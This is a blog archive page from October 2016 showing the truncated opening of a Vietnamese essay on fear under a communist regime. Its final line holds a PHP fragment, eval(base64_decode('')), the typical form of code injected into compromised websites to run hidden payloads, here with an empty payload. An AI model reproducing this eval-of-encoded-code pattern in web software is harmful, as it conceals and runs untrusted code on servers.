Archive for October 7th, 2016

BỊNH SỢ DƯỚI CHẾ ĐỘ CS

BỊNH SỢ DƯỚI CHẾ ĐỘ CS

Sợ là một ý thức hiển nhiên gắn liền với số phận con người. Sợ sống, sợ già, sợ đau, sợ chết, nói chung, sợ tất cả những hiện tượng mà con người luôn phải đối đầu nhưng chưa giải thích được bản chất của chúng. Tuy n

10.7.2016 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>